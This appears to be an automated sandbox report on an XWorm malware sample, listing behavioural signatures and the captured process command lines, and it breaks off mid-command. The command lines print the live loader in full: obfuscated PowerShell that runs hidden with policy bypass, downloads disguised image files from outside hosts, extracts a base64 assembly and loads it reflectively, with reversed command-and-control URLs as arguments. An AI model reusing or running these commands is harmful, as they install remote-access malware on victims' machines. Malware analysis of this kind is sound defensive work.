Analysis Overview
SHA256
9c33e83331c4e2e954f355f453bd32add84016d45e6434d568fb56b690de26ce
Threat Level: Known bad
The file junexw.exe was found to be: Known bad.
Malicious Activity Summary
Detect Xworm Payload
Xworm
Xworm family
Blocklisted process makes network request
Command and Scripting Interpreter: PowerShell
Reads user/profile data of web browsers
Legitimate hosting services abused for malware hosting/C2
Adds Run key to start application
Suspicious use of NtSetInformationThreadHideFromDebugger
Suspicious use of NtCreateThreadExHideFromDebugger
Suspicious use of SetThreadContext
Unsigned PE
Enumerates physical storage devices
Command and Scripting Interpreter: JavaScript
Suspicious use of SetWindowsHookEx
Suspicious behavior: EnumeratesProcesses
Suspicious behavior: MapViewOfSection
Modifies registry key
Suspicious behavior: GetForegroundWindowSpam
Suspicious use of WriteProcessMemory
Suspicious use of AdjustPrivilegeToken
Modifies registry class
MITRE ATT&CK Matrix V13
Analysis: static1
Detonation Overview
Reported
2024-06-13 21:22
Signatures
Detect Xworm Payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Xworm family
Unsigned PE
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Analysis: behavioral1
Detonation Overview
Submitted
2024-06-13 21:22
Reported
2024-06-13 22:33
Platform
win7-20240221-en
Max time kernel
1793s
Max time network
1800s
Command Line
Signatures
Detect Xworm Payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Xworm
Blocklisted process makes network request
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Legitimate hosting services abused for malware hosting/C2
| Description | Indicator | Process | Target |
| N/A | pastebin.com | N/A | N/A |
| N/A | pastebin.com | N/A | N/A |
Command and Scripting Interpreter: JavaScript
Enumerates physical storage devices
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\junexw.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: GetForegroundWindowSpam
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\junexw.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\junexw.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\junexw.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\junexw.exe
"C:\Users\Admin\AppData\Local\Temp\junexw.exe"
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\crrlge.vbe"
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\jnkknt.js"
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\jnznkv.vbs"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$codigo = 'ZgB1DgTreG4DgTreYwB0DgTreGkDgTrebwBuDgTreCDgTreDgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreRgByDgTreG8DgTrebQBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB7DgTreCDgTreDgTrecDgTreBhDgTreHIDgTreYQBtDgTreCDgTreDgTreKDgTreBbDgTreHMDgTredDgTreByDgTreGkDgTrebgBnDgTreFsDgTreXQBdDgTreCQDgTrebDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreCDgTreDgTrePQDgTregDgTreE4DgTreZQB3DgTreC0DgTreTwBiDgTreGoDgTreZQBjDgTreHQDgTreIDgTreBTDgTreHkDgTrecwB0DgTreGUDgTrebQDgTreuDgTreE4DgTreZQB0DgTreC4DgTreVwBlDgTreGIDgTreQwBsDgTreGkDgTreZQBuDgTreHQDgTreOwDgTregDgTreCQDgTreZDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreGUDgTreZDgTreBEDgTreGEDgTredDgTreBhDgTreCDgTreDgTrePQDgTregDgTreEDgTreDgTreKDgTreDgTrepDgTreDsDgTreIDgTreDgTrekDgTreHMDgTreaDgTreB1DgTreGYDgTreZgBsDgTreGUDgTreZDgTreBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreDgTre9DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB8DgTreCDgTreDgTreRwBlDgTreHQDgTreLQBSDgTreGEDgTrebgBkDgTreG8DgTrebQDgTregDgTreC0DgTreQwBvDgTreHUDgTrebgB0DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreLgBMDgTreGUDgTrebgBnDgTreHQDgTreaDgTreDgTre7DgTreCDgTreDgTreZgBvDgTreHIDgTreZQBhDgTreGMDgTreaDgTreDgTregDgTreCgDgTreJDgTreBsDgTreGkDgTrebgBrDgTreCDgTreDgTreaQBuDgTreCDgTreDgTreJDgTreBzDgTreGgDgTredQBmDgTreGYDgTrebDgTreBlDgTreGQDgTreTDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreB7DgTreCDgTreDgTredDgTreByDgTreHkDgTreIDgTreB7DgTreCDgTreDgTreJDgTreBkDgTreG8DgTredwBuDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEQDgTreYQB0DgTreGEDgTreIDgTreDgTrerDgTreD0DgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreC4DgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreKDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTreKQDgTregDgTreH0DgTreIDgTreBjDgTreGEDgTredDgTreBjDgTreGgDgTreIDgTreB7DgTreCDgTreDgTreYwBvDgTreG4DgTredDgTreBpDgTreG4DgTredQBlDgTreCDgTreDgTrefQDgTregDgTreH0DgTreOwDgTregDgTreHIDgTreZQB0DgTreHUDgTrecgBuDgTreCDgTreDgTreJDgTreBkDgTreG8DgTredwBuDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEQDgTreYQB0DgTreGEDgTreIDgTreB9DgTreDsDgTreIDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTrecwDgTregDgTreD0DgTreIDgTreBDgTreDgTreCgDgTreJwBoDgTreHQDgTredDgTreBwDgTreHMDgTreOgDgTrevDgTreC8DgTredQBwDgTreGwDgTrebwBhDgTreGQDgTreZDgTreBlDgTreGkDgTrebQBhDgTreGcDgTreZQBuDgTreHMDgTreLgBjDgTreG8DgTrebQDgTreuDgTreGIDgTrecgDgTrevDgTreGkDgTrebQBhDgTreGcDgTreZQBzDgTreC8DgTreMDgTreDgTrewDgTreDQDgTreLwDgTre3DgTreDkDgTreMwDgTrevDgTreDUDgTreNwDgTre4DgTreC8DgTrebwByDgTreGkDgTreZwBpDgTreG4DgTreYQBsDgTreC8DgTredgBiDgTreHMDgTreLgBqDgTreHDgTreDgTreZwDgTre/DgTreDEDgTreNwDgTrexDgTreDcDgTreNgDgTre3DgTreDEDgTreODgTreDgTre0DgTreDQDgTreJwDgTresDgTreCDgTreDgTreJwBoDgTreHQDgTredDgTreBwDgTreHMDgTreOgDgTrevDgTreC8DgTredQBwDgTreGwDgTrebwBhDgTreGQDgTreZDgTreBlDgTreGkDgTrebQBhDgTreGcDgTreZQBuDgTreHMDgTreLgBjDgTreG8DgTrebQDgTreuDgTreGIDgTrecgDgTrevDgTreGkDgTrebQBhDgTreGcDgTreZQBzDgTreC8DgTreMDgTreDgTrewDgTreDQDgTreLwDgTre3DgTreDkDgTreMwDgTrevDgTreDUDgTreNwDgTre4DgTreC8DgTrebwByDgTreGkDgTreZwBpDgTreG4DgTreYQBsDgTreC8DgTredgBiDgTreHMDgTreLgBqDgTreHDgTreDgTreZwDgTre/DgTreDEDgTreNwDgTrexDgTreDcDgTreNgDgTre3DgTreDEDgTreODgTreDgTre0DgTreDQDgTreJwDgTrepDgTreDsDgTreIDgTreDgTrekDgTreGkDgTrebQBhDgTreGcDgTreZQBCDgTreHkDgTredDgTreBlDgTreHMDgTreIDgTreDgTre9DgTreCDgTreDgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreRgByDgTreG8DgTrebQBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTrecwDgTre7DgTreCDgTreDgTreaQBmDgTreCDgTreDgTreKDgTreDgTrekDgTreGkDgTrebQBhDgTreGcDgTreZQBCDgTreHkDgTredDgTreBlDgTreHMDgTreIDgTreDgTretDgTreG4DgTreZQDgTregDgTreCQDgTrebgB1DgTreGwDgTrebDgTreDgTrepDgTreCDgTreDgTreewDgTregDgTreCQDgTreaQBtDgTreGEDgTreZwBlDgTreFQDgTreZQB4DgTreHQDgTreIDgTreDgTre9DgTreCDgTreDgTreWwBTDgTreHkDgTrecwB0DgTreGUDgTrebQDgTreuDgTreFQDgTreZQB4DgTreHQDgTreLgBFDgTreG4DgTreYwBvDgTreGQDgTreaQBuDgTreGcDgTreXQDgTre6DgTreDoDgTreVQBUDgTreEYDgTreODgTreDgTreuDgTreEcDgTreZQB0DgTreFMDgTredDgTreByDgTreGkDgTrebgBnDgTreCgDgTreJDgTreBpDgTreG0DgTreYQBnDgTreGUDgTreQgB5DgTreHQDgTreZQBzDgTreCkDgTreOwDgTregDgTreCQDgTrecwB0DgTreGEDgTrecgB0DgTreEYDgTrebDgTreBhDgTreGcDgTreIDgTreDgTre9DgTreCDgTreDgTreJwDgTre8DgTreDwDgTreQgBBDgTreFMDgTreRQDgTre2DgTreDQDgTreXwBTDgTreFQDgTreQQBSDgTreFQDgTrePgDgTre+DgTreCcDgTreOwDgTregDgTreCQDgTreZQBuDgTreGQDgTreRgBsDgTreGEDgTreZwDgTregDgTreD0DgTreIDgTreDgTrenDgTreDwDgTrePDgTreBCDgTreEEDgTreUwBFDgTreDYDgTreNDgTreBfDgTreEUDgTreTgBEDgTreD4DgTrePgDgTrenDgTreDsDgTreIDgTreDgTrekDgTreHMDgTredDgTreBhDgTreHIDgTredDgTreBJDgTreG4DgTreZDgTreBlDgTreHgDgTreIDgTreDgTre9DgTreCDgTreDgTreJDgTreBpDgTreG0DgTreYQBnDgTreGUDgTreVDgTreBlDgTreHgDgTredDgTreDgTreuDgTreEkDgTrebgBkDgTreGUDgTreeDgTreBPDgTreGYDgTreKDgTreDgTrekDgTreHMDgTredDgTreBhDgTreHIDgTredDgTreBGDgTreGwDgTreYQBnDgTreCkDgTreOwDgTregDgTreCQDgTreZQBuDgTreGQDgTreSQBuDgTreGQDgTreZQB4DgTreCDgTreDgTrePQDgTregDgTreCQDgTreaQBtDgTreGEDgTreZwBlDgTreFQDgTreZQB4DgTreHQDgTreLgBJDgTreG4DgTreZDgTreBlDgTreHgDgTreTwBmDgTreCgDgTreJDgTreBlDgTreG4DgTreZDgTreBGDgTreGwDgTreYQBnDgTreCkDgTreOwDgTregDgTreGkDgTreZgDgTregDgTreCgDgTreJDgTreBzDgTreHQDgTreYQByDgTreHQDgTreSQBuDgTreGQDgTreZQB4DgTreCDgTreDgTreLQBnDgTreGUDgTreIDgTreDgTrewDgTreCDgTreDgTreLQBhDgTreG4DgTreZDgTreDgTregDgTreCQDgTreZQBuDgTreGQDgTreSQBuDgTreGQDgTreZQB4DgTreCDgTreDgTreLQBnDgTreHQDgTreIDgTreDgTrekDgTreHMDgTredDgTreBhDgTreHIDgTredDgTreBJDgTreG4DgTreZDgTreBlDgTreHgDgTreKQDgTregDgTreHsDgTreIDgTreDgTrekDgTreHMDgTredDgTreBhDgTreHIDgTredDgTreBJDgTreG4DgTreZDgTreBlDgTreHgDgTreIDgTreDgTrerDgTreD0DgTreIDgTreDgTrekDgTreHMDgTredDgTreBhDgTreHIDgTredDgTreBGDgTreGwDgTreYQBnDgTreC4DgTreTDgTreBlDgTreG4DgTreZwB0DgTreGgDgTreOwDgTregDgTreCQDgTreYgBhDgTreHMDgTreZQDgTre2DgTreDQDgTreTDgTreBlDgTreG4DgTreZwB0DgTreGgDgTreIDgTreDgTre9DgTreCDgTreDgTreJDgTreBlDgTreG4DgTreZDgTreBJDgTreG4DgTreZDgTreBlDgTreHgDgTreIDgTreDgTretDgTreCDgTreDgTreJDgTreBzDgTreHQDgTreYQByDgTreHQDgTreSQBuDgTreGQDgTreZQB4DgTreDsDgTreIDgTreDgTrekDgTreGIDgTreYQBzDgTreGUDgTreNgDgTre0DgTreEMDgTrebwBtDgTreG0DgTreYQBuDgTreGQDgTreIDgTreDgTre9DgTreCDgTreDgTreJDgTreBpDgTreG0DgTreYQBnDgTreGUDgTreVDgTreBlDgTreHgDgTredDgTreDgTreuDgTreFMDgTredQBiDgTreHMDgTredDgTreByDgTreGkDgTrebgBnDgTreCgDgTreJDgTreBzDgTreHQDgTreYQByDgTreHQDgTreSQBuDgTreGQDgTreZQB4DgTreCwDgTreIDgTreDgTrekDgTreGIDgTreYQBzDgTreGUDgTreNgDgTre0DgTreEwDgTreZQBuDgTreGcDgTredDgTreBoDgTreCkDgTreOwDgTregDgTreCQDgTreYwBvDgTreG0DgTrebQBhDgTreG4DgTreZDgTreBCDgTreHkDgTredDgTreBlDgTreHMDgTreIDgTreDgTre9DgTreCDgTreDgTreWwBTDgTreHkDgTrecwB0DgTreGUDgTrebQDgTreuDgTreEMDgTrebwBuDgTreHYDgTreZQByDgTreHQDgTreXQDgTre6DgTreDoDgTreRgByDgTreG8DgTrebQBCDgTreGEDgTrecwBlDgTreDYDgTreNDgTreBTDgTreHQDgTrecgBpDgTreG4DgTreZwDgTreoDgTreCQDgTreYgBhDgTreHMDgTreZQDgTre2DgTreDQDgTreQwBvDgTreG0DgTrebQBhDgTreG4DgTreZDgTreDgTrepDgTreDsDgTreIDgTreDgTrekDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEEDgTrecwBzDgTreGUDgTrebQBiDgTreGwDgTreeQDgTregDgTreD0DgTreIDgTreBbDgTreFMDgTreeQBzDgTreHQDgTreZQBtDgTreC4DgTreUgBlDgTreGYDgTrebDgTreBlDgTreGMDgTredDgTreBpDgTreG8DgTrebgDgTreuDgTreEEDgTrecwBzDgTreGUDgTrebQBiDgTreGwDgTreeQBdDgTreDoDgTreOgBMDgTreG8DgTreYQBkDgTreCgDgTreJDgTreBjDgTreG8DgTrebQBtDgTreGEDgTrebgBkDgTreEIDgTreeQB0DgTreGUDgTrecwDgTrepDgTreDsDgTreIDgTreDgTrekDgTreHQDgTreeQBwDgTreGUDgTreIDgTreDgTre9DgTreCDgTreDgTreJDgTreBsDgTreG8DgTreYQBkDgTreGUDgTreZDgTreBBDgTreHMDgTrecwBlDgTreG0DgTreYgBsDgTreHkDgTreLgBHDgTreGUDgTredDgTreBUDgTreHkDgTrecDgTreBlDgTreCgDgTreJwBSDgTreHUDgTrebgBQDgTreEUDgTreLgBIDgTreG8DgTrebQBlDgTreCcDgTreKQDgTre7DgTreCDgTreDgTreJDgTreBtDgTreGUDgTredDgTreBoDgTreG8DgTreZDgTreDgTregDgTreD0DgTreIDgTreDgTrekDgTreHQDgTreeQBwDgTreGUDgTreLgBHDgTreGUDgTredDgTreBNDgTreGUDgTredDgTreBoDgTreG8DgTreZDgTreDgTreoDgTreCcDgTreVgBBDgTreEkDgTreJwDgTrepDgTreC4DgTreSQBuDgTreHYDgTrebwBrDgTreGUDgTreKDgTreDgTrekDgTreG4DgTredQBsDgTreGwDgTreLDgTreDgTregDgTreFsDgTrebwBiDgTreGoDgTreZQBjDgTreHQDgTreWwBdDgTreF0DgTreIDgTreDgTreoDgTreCcDgTredDgTreB4DgTreHQDgTreLgBuDgTreHUDgTreagBuDgTreGUDgTrecwBhDgTreC8DgTrebQBvDgTreGMDgTreLgBpDgTreGMDgTreaQByDgTreGEDgTreawBpDgTreGMDgTreZQBrDgTreGUDgTrebDgTreBvDgTreGoDgTreZQBpDgTreHYDgTreLwDgTrevDgTreDoDgTrecwBwDgTreHQDgTredDgTreBoDgTreCcDgTreIDgTreDgTresDgTreCDgTreDgTreJwBkDgTreGUDgTrecwBhDgTreHQDgTreaQB2DgTreGEDgTreZDgTreBvDgTreCcDgTreIDgTreDgTresDgTreCDgTreDgTreJwBkDgTreGUDgTrecwBhDgTreHQDgTreaQB2DgTreGEDgTreZDgTreBvDgTreCcDgTreIDgTreDgTresDgTreCDgTreDgTreJwBkDgTreGUDgTrecwBhDgTreHQDgTreaQB2DgTreGEDgTreZDgTreBvDgTreCcDgTreLDgTreDgTrenDgTreFIDgTreZQBnDgTreEEDgTrecwBtDgTreCcDgTreLDgTreDgTrenDgTreCcDgTreKQDgTrepDgTreH0DgTreIDgTreB9DgTreDgTre==';$oWjuxd = [system.Text.encoding]::Unicode.GetString([system.convert]::Frombase64string( $codigo.replace('DgTre','A') ));powershell.exe -windowstyle hidden -executionpolicy bypass -Noprofile -command $OWjuxD"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$Codigo = 'ZnVuY3Rpb24gRG93bmxvYWREYXRhRnJvbUxpbmtzIHsgcGFyYW0gKFtzdHJpbmdbXV0kbGlua3MpICR3ZWJDbGllbnQgPSBOZXctT2JqZWN0IFN5c3RlbS5OZXQuV2ViQ2xpZW50OyAkZG93bmxvYWRlZERhdGEgPSBAKCk7ICRzaHVmZmxlZExpbmtzID0gJGxpbmtzIHwgR2V0LVJhbmRvbSAtQ291bnQgJGxpbmtzLkxlbmd0aDsgZm9yZWFjaCAoJGxpbmsgaW4gJHNodWZmbGVkTGlua3MpIHsgdHJ5IHsgJGRvd25sb2FkZWREYXRhICs9ICR3ZWJDbGllbnQuRG93bmxvYWREYXRhKCRsaW5rKSB9IGNhdGNoIHsgY29udGludWUgfSB9OyByZXR1cm4gJGRvd25sb2FkZWREYXRhIH07ICRsaW5rcyA9IEAoJ2h0dHBzOi8vdXBsb2FkZGVpbWFnZW5zLmNvbS5ici9pbWFnZXMvMDA0Lzc5OC8wMTUvb3JpZ2luYWwvbmV3X2ltYWdlLmpwZz8xNzE4Mjg0MjE2JywgJ2h0dHBzOi8vdXBsb2FkZGVpbWFnZW5zLmNvbS5ici9pbWFnZXMvMDA0Lzc5OC8wMTUvb3JpZ2luYWwvbmV3X2ltYWdlLmpwZz8xNzE4Mjg0MjE2Jyk7ICRpbWFnZUJ5dGVzID0gRG93bmxvYWREYXRhRnJvbUxpbmtzICRsaW5rczsgaWYgKCRpbWFnZUJ5dGVzIC1uZSAkbnVsbCkgeyAkaW1hZ2VUZXh0ID0gW1N5c3RlbS5UZXh0LkVuY29kaW5nXTo6VVRGOC5HZXRTdHJpbmcoJGltYWdlQnl0ZXMpOyAkc3RhcnRGbGFnID0gJzw8QkFTRTY0X1NUQVJUPj4nOyAkZW5kRmxhZyA9ICc8PEJBU0U2NF9FTkQ+Pic7ICRzdGFydEluZGV4ID0gJGltYWdlVGV4dC5JbmRleE9mKCRzdGFydEZsYWcpOyAkZW5kSW5kZXggPSAkaW1hZ2VUZXh0LkluZGV4T2YoJGVuZEZsYWcpOyBpZiAoJHN0YXJ0SW5kZXggLWdlIDAgLWFuZCAkZW5kSW5kZXggLWd0ICRzdGFydEluZGV4KSB7ICRzdGFydEluZGV4ICs9ICRzdGFydEZsYWcuTGVuZ3RoOyAkYmFzZTY0TGVuZ3RoID0gJGVuZEluZGV4IC0gJHN0YXJ0SW5kZXg7ICRiYXNlNjRDb21tYW5kID0gJGltYWdlVGV4dC5TdWJzdHJpbmcoJHN0YXJ0SW5kZXgsICRiYXNlNjRMZW5ndGgpOyAkY29tbWFuZEJ5dGVzID0gW1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygkYmFzZTY0Q29tbWFuZCk7ICRsb2FkZWRBc3NlbWJseSA9IFtTeXN0ZW0uUmVmbGVjdGlvbi5Bc3NlbWJseV06OkxvYWQoJGNvbW1hbmRCeXRlcyk7ICR0eXBlID0gJGxvYWRlZEFzc2VtYmx5LkdldFR5cGUoJ1J1blBFLkhvbWUnKTsgJG1ldGhvZCA9ICR0eXBlLkdldE1ldGhvZCgnVkFJJykuSW52b2tlKCRudWxsLCBbb2JqZWN0W11dICgndHh0LndlbnlhbW52aC9sYy5zYXlvanJldmVsYy8vOnNwdHRoJyAsICdkZXNhdGl2YWRvJyAsICdkZXNhdGl2YWRvJyAsICdkZXNhdGl2YWRvJywnUmVnQXNtJywnZGVzYXRpdmFkbycpKX19';$OWjuxd = (New-Object System.Text.UTF8Encoding).GetString([System.Convert]::FromBase64String($Codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -Noprofile -command "function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $downloadedData = @(); $shuffledLinks = $links | Get-Random -Count $links.Length; foreach ($link in $shuffledLinks) { try { $downloadedData += $webClient.DownloadData($link) } catch { continue } }; return $downloadedData }; $links = @('https://uploaddeimagens.com.br/images/004/793/578/original/vbs.jpg?1717671844', 'https://uploaddeimagens.com.br/images/004/793/578/original/vbs.jpg?1717671844'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $commandBytes = [System.Convert]::FromBase64String($base64Command); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $type = $loadedAssembly.GetType('RunPE.Home'); $method = $type.GetMethod('VAI').Invoke($null, [object[]] ('txt.nujnesa/moc.icirakicekelojeiv//:sptth' , 'desativado' , 'desativado' , 'desativado','RegAsm',''))} }"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $downloadedData = @(); $shuffledLinks = $links | Get-Random -Count $links.Length; foreach ($link in $shuffledLinks) { try { $downloadedData += $webClient.DownloadData($link) } catch { continue } }; return $downloadedData }; $links = @('https://uploaddeimagens.com.br/images/004/798/015/original/new_image.jpg?1718284216', 'https://uploaddeimagens.com.br/images/004/798/015/original/new_image.jpg?1718284216'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $commandBytes = [System.Convert]::FromBase64String($base64Command); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $type = $loadedAssembly.GetType('RunPE.Home'); $method = $type.GetMethod('VAI').Invoke($null, [object[]] ('txt.wenyamnvh/lc.sayojrevelc//:sptth' , 'desativado' , 'desativado' , 'desativado','RegAsm','desativado'))}}"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Ovaloid = 1;$Pengestrkes='ring';$Mekhitarist198='S';Function Placque($Ansigtsformens){$Bantamweight=$Ansigtsformens.Length-$Ovaloid;$Sowel=$Mekhitarist198+'ubst'+$Pengestrkes;For( $Frizzle=2;$Frizzle -lt $Bantamweight;$Frizzle+=3){$Outgarment+=$Ansigtsformens.$Sowel.Invoke( $Frizzle, $Ovaloid);}$Outgarment;}function Quatrible($Pusheres){ . ($Phenylene) ($Pusheres);}$Extense=Placque 'PhMBroDiz SiBalMalGraDo/ a5 K.Kk0Te ,a(SwW JiChnU,dGeo .wBas t gNNrTM. Ve1 F0D.. U0.o;In CoW riPrnSt6O.4A.;sl U.xR,6 U4Po; . Ar evra:He1Gu2Sp1,o.Ve0Mi)Lo tjGBieSac,uk toPm/ T2 S0 o1Bi0 .0 C1,u0Li1 u .FC iForBue bfUdoMax C/ t1Pi2 C1 t. e0Po ';$Cigartndere=Placque 'CaU As aemerMo-DaApagLaeHan at , ';$Unilaterale=Placque 'A,h,etFit CpBas .: e/ o/ an SzScaHar oi a.a.SpoElrP gOu/ Bs ,xCi/AzO,yvToaSpr iKaoKisF.tNioRemHiyR . HcV sTuvS ';$Forsgscentret=Placque 'Be> P ';$Phenylene=Placque 'S,i ,eM.xGe ';$Passionfruit='Dismes';$synanons = Placque 'Fre ic eh Ho,e r% Paf.pAlpO,d maUdtUdaG %No\H KdydN,fBoaF.rStsT,2N.1Ud1Vi.ExA Pr DbGr Aa& L&Tn TeTrcSth,aoSe FotBa ';Quatrible (Placque 'Ge$pogStl AoAlb .aFolFe:DiNK y Thd.eRudTasChfGooglrKvm SiSudUblN.iIsnT,gW e rNynTaePo=b (S.c,hmNadIm Va/SecPr Ko$.rsJ y,in UaTonAno.rnBus G)F, ');Quatrible (Placque 'Un$.sg.pl no b Rar l n: Af.arBiePse,al Ha nBrcKieS.jBro ru Mrkansta ,lGai ksPrtvie KrRa= U$veUrenBai.il laTot Ae IrBeaGalAred..,tsH pHolPhiSdtBi(S $,aFamoAurVes UgStsboc eGenJatUnr Ae.ytH,) r ');Quatrible (Placque ' T[T.N Uet.tWv.TrSA.eThrTavInilucCoeQuPIno IiH,nCot MCaa enPraRegAfeStr J]N,:Ca:HiSJ,e ,c UuRer,hiByt.ly.oP.arDeoPrtK,o cK.oAklKv .k=,o F[C.NBreEntHa.TsSEde DcU,u arChiBytChyyePLir to,lt.roHacInoColBeTSeySap,xeD,]Ej:In:SoT Rl s.k1Bo2Gr ');$Unilaterale=$freelancejournalister[0];$pneumatocyst= (Placque 'Pa$BagTrlB.oF b ga ,lTe:.eH io .r TmB,oSpgReo ynUna l eTusFr= NH,eN w e- jODobKajUne CcFetP, .yS Uy.fsEmt BeBomM.. LNCle PtB . GWUde abFaC LlSkiBaeLan Kt');$pneumatocyst+=$Nyhedsformidlingerne[1];Quatrible ($pneumatocyst);Quatrible (Placque 'Br$ SHH oA r.rmWeoUtgPuog.n ,aZ lCue Ss,k.KoHGyeSmaBed HeForEksEs[ P$ChC .iHogA,a ur WtP,nCydI.eM,rLiesk]Gr= J$.eEAqx DtcueSinPesEceA ');$Vitriners=Placque '.i$ .HN.o ArAbmSpo,rgA.o MnBeaS,l KeK sSa.MeDTwo ewBen el EoRaa d.eF,oiP lVae .(Ep$HiU .nFoiFulTiaFutC e .r SaD,lSaeG ,Co$t.M aoB,nL.d ungai tKueP tVe),s ';$Mondnitet=$Nyhedsformidlingerne[0];Quatrible (Placque 'St$BagB.lReoAub Ra Sl,l:SkS .yTos it FeGemTyi .sVie HrBi= (A T KeDes ctHo-KvPAlaOrtMeh.n Vo$P M.ooMinakdBln,aiG t,aeLyt.r)Ap ');while (!$Systemiser) {Quatrible (Placque ' O$stgPelShoknb aBel i:CoRw,aUnpCos uo Dd MiSpeKar E=Ud$ Rt srKouHoeUr ') ;Quatrible $Vitriners;Quatrible (Placque 'F,S.ct SaMer.ctP.-.aSA lKoeK,eP,p V Na4di ');Quatrible (Placque 'Th$ hgfalF oUdbb,aP,lAl:FiSSty.hs EtT,e ,m oiQ s JeBerTr=Ri(ErTk,eCosgetPa-KeP.ua.nt MhF. .$NeM aoHenUdd UnFaiCltW,e Ot.r) I ') ;Quatrible (Placque 